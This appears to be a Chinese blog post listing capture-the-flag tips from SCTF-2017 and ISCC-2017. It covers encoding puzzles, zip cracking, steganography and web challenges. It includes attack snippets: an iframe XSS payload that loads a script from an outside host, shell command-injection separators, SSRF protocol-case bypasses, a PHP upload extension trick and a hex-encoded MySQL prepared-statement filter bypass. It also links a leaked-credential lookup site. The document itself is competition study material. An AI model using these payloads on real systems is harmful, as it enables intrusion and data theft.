Cyrus Flag

flag{S0_bangbang_7ha7_u_f1nd_h3r3}

CTF脑洞总结(置顶+不定期更新)

SCTF-2017

  • 签到MISC题什么的不会是什么高深的密码学,常规解码+栅栏+凯撒,比如这种:

    Z2dRQGdRMWZxaDBvaHRqcHRfc3d7Z2ZoZ3MjfQ==

     

  • Git题什么的可以直接用四叶草的GitHack(尤其是在做四叶草比赛的时候) 

    git clone https://github.com/BugScanTeam/GitHack

    git log -u 查看历史提交记录

    报错 refname '8894bb4d45643d52b5eb8175710999fcd398ebd4' is ambiguous. 可以考虑使用 git config advice.objectNameWarning false关闭报错。

     

  • U2Fsd开头可能是AES加盐。一般会提示密码。

    不提示就猜啊!

     

  • 各种隐写都考虑一下 OurSecret 这个工具吧。一般会提示密码。

    不提示就猜啊!

     

  • 压缩包密码小技巧:

    Step1 = 先跑一遍纯数字暴力。

    Step2 = 伪协议,0x504B 开始9-10位,改为 0x0000 解压一次。或者直接用工具 ZipCenOp.jar 解压。

    Step2 = 如果得到部分文件,剩下的文件可以选择已知明文攻击,将已知文件打包为另一个zip,用 Advanced Archive Password Recovery 即可。

    再不行就猜啊!

     

  • binwalk跑之前文件中有falg_balabala之类的可疑字样和一个有密码的压缩包,不如先试下密码。

     

  • SSRF题,file协议和ftp协议大小写是无所谓的,FiLe和Ftp什么的也许是绕过的好方法。

    顺便看下能不能扫到别的题目。。。

     

  • Git题一脸懵逼的时候不妨去找一下私钥然后直接 git pull

 

ISCC-2017 

  • 密码位方形+圆点=猪圈密码。又名共济会密码!别错过了什么提示词。

     

  • 嗯,压缩包还是先暴力一波纯数字的。

     

  • 嗯,键盘四个字母围起来,也算是密码。3-4位一组算提示吧。

     

  • cap握手包破解:aircrack工具

     

  • 某个文件上传:PHP5 or PHT文件

     

  • 某个弱类型: iscc={"bar1":"2017a","bar2":[[1],1,2,3,0]}&cat[0]=00isccctf2017&cat[1][]=1111&dog=%00}

     

  • 音频前面某些部位有方波,之后莫尔斯码。

     

  • MySQL会忽略字符集外的字符,用于绕过$_string! !== "admin",post数据结尾加入字符集外的字符。

     

  • shell执行命令方式:command和$(command)

    shell连接命令方式:;、|、&、%0a

  • 1
    <iframe srcdoc="%80<script>window.parent.document.body.appendChild(window.parent.document.createElement('script')).src='http://x.x.x.x/1.js'</script>">

  • 注入时如果GET过滤严格考虑一下POST

     

  • IP地址的其他写法:ref:http://www.freebuf.com/articles/web/135342.html

     

  • 社工库:http://s.70sec.com/

     

  • MySQL预查询:

    1
    SET @SQL=0x494E5345525420494E544F206D6F76696520286E616D652C20636F6E74656E74292056414C55455320282761616161272C27616161612729;PREPARE pord FROM @SQL;EXECUTE pord;
    其中0x494E5345525420494E544F206D6F76696520286E616D652C20636F6E74656E7429205 6414C55455320282761616161272C27616161612729可以解码为INSERT INTO movie (name, content) VALUES ('aaaa','aaaa')
    
1
2

(未完也别待续了)